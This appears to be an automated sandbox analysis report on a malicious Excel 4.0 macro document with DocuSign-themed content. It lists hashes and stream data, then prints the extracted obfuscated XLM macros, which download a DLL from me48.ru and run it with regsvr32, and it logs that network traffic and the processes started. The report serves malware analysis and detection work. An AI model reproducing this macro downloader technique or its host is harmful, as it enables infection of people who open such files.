    Preview: ........g2.........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1

    Static File Info

    General

    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:45:46 2020, Security: 0
    Entropy (8bit):7.522918762403885
    TrID:
    • Microsoft Excel sheet (30009/1) 78.94%
    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
    File name:document-1444032431.xls
    File size:338944
    MD5:407b70bcaef4d41cc7f63ceb6412a692
    SHA1:2cc134d5c5ea93bbbb0212f8d692484cc76766bd
    SHA256:6bbfff6e9dd29269927c954da80d86b6f91928e2fd049a92a72dca9e08140bd1
    SHA512:b48aba642ff0d96d50a6833c4076c476aa4255caed3f83c032b0936cb0df910e5aae99211122e678388e5f1f05fe2a71a8a5a194bfd47d40f75ac170e1fa8227
    SSDEEP:6144:YcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpTa:Cizo8RnsIROnr6n75YV
    File Content Preview:........................>......................................................................................................................................................................................................................................

    File Icon

    Icon Hash:e4eea286a4b4bcb4

    Static OLE Info

    General

    Document Type:OLE
    Number of OLE Files:1

    OLE File "document-1444032431.xls"

    Indicators

    Has Summary Info:True
    Application Name:Microsoft Excel
    Encrypted Document:False
    Contains Word Document Stream:False
    Contains Workbook/Book Stream:True
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Code Page:1251
    Author:
    Last Saved By:
    Create Time:2006-09-16 00:00:00
    Last Saved Time:2020-11-26 09:45:46
    Creating Application:Microsoft Excel
    Security:0

    Document Summary

    Document Code Page:1251
    Thumbnail Scaling Desired:False
    Contains Dirty Links:False
    Shared Document:False
    Changed Hyperlinks:False
    Application Version:917504

    Streams

    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5DocumentSummaryInformation
    File Type:data
    Stream Size:4096
    Entropy:0.367004077607
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5SummaryInformation
    File Type:data
    Stream Size:4096
    Entropy:0.254255489206
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 326259
    General
    Stream Path:Workbook
    File Type:Applesoft BASIC program data, first line number 16
    Stream Size:326259
    Entropy:7.65610249915
    Base64 Encoded:True
    Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
    Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

    Macro 4.0 Code

    CALL("Ke"&????2!HN342&"32", "Cr"&????2!HP370&"yA", "JCJ", ????2!HE340&????2!HE355, 0)
    
    CALL("U"&????2!HP360, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!HE340&????2!HE355&????2!HE369, 0, 0)
    
    =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!HN342&""32"",""Cr""&????2!HP370&""yA"",""JCJ"",????2!HE340&????2!HE355,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
    "=CALL(""Ke""&????2!HN342&""32"",""Cr""&????2!HP370&""yA"",""JCJ"",????2!HE340,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
    "=CALL(""U""&????2!HP360,""U""&????4!E65,""IICCII"",0,????2!EE100,????2!HE340&????2!HE355&????2!HE369,0,0)"=EXEC(????3!W36&????2!HE340&????2!HE355&????2!HE369)=HALT()

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Nov 29, 2020 05:41:28.855443954 CET4916780192.168.2.22188.225.24.87
    Nov 29, 2020 05:41:28.910079956 CET8049167188.225.24.87192.168.2.22
    Nov 29, 2020 05:41:28.910273075 CET4916780192.168.2.22188.225.24.87
    Nov 29, 2020 05:41:28.911406040 CET4916780192.168.2.22188.225.24.87
    Nov 29, 2020 05:41:28.966334105 CET8049167188.225.24.87192.168.2.22
    Nov 29, 2020 05:41:29.961657047 CET8049167188.225.24.87192.168.2.22
    Nov 29, 2020 05:41:29.961832047 CET4916780192.168.2.22188.225.24.87
    Nov 29, 2020 05:41:34.966869116 CET8049167188.225.24.87192.168.2.22
    Nov 29, 2020 05:41:34.967108011 CET4916780192.168.2.22188.225.24.87
    Nov 29, 2020 05:43:28.701821089 CET4916780192.168.2.22188.225.24.87
    Nov 29, 2020 05:43:29.012782097 CET4916780192.168.2.22188.225.24.87
    Nov 29, 2020 05:43:29.621284008 CET4916780192.168.2.22188.225.24.87
    Nov 29, 2020 05:43:30.822590113 CET4916780192.168.2.22188.225.24.87
    Nov 29, 2020 05:43:33.225101948 CET4916780192.168.2.22188.225.24.87
    Nov 29, 2020 05:43:38.030380011 CET4916780192.168.2.22188.225.24.87
    Nov 29, 2020 05:43:47.640938044 CET4916780192.168.2.22188.225.24.87

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Nov 29, 2020 05:41:28.748198986 CET5219753192.168.2.228.8.8.8
    Nov 29, 2020 05:41:28.833195925 CET53521978.8.8.8192.168.2.22

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
    Nov 29, 2020 05:41:28.748198986 CET192.168.2.228.8.8.80x9610Standard query (0)me48.ruA (IP address)IN (0x0001)

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
    Nov 29, 2020 05:41:28.833195925 CET8.8.8.8192.168.2.220x9610No error (0)me48.ru188.225.24.87A (IP address)IN (0x0001)

    HTTP Request Dependency Graph

    • me48.ru

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249167188.225.24.8780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Nov 29, 2020 05:41:28.911406040 CET0OUTGET /ds/231120.gif HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: me48.ru
    Connection: Keep-Alive
    Nov 29, 2020 05:41:29.961657047 CET0INHTTP/1.1 200 OK
    Date: Sun, 29 Nov 2020 04:41:28 GMT
    Server: Apache/2.4.18 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: image/gif


    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Start time:05:41:38
    Start date:29/11/2020
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13fea0000
    File size:27641504 bytes
    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:05:41:42
    Start date:29/11/2020
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Imagebase:0xff300000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Code Analysis

    Reset < >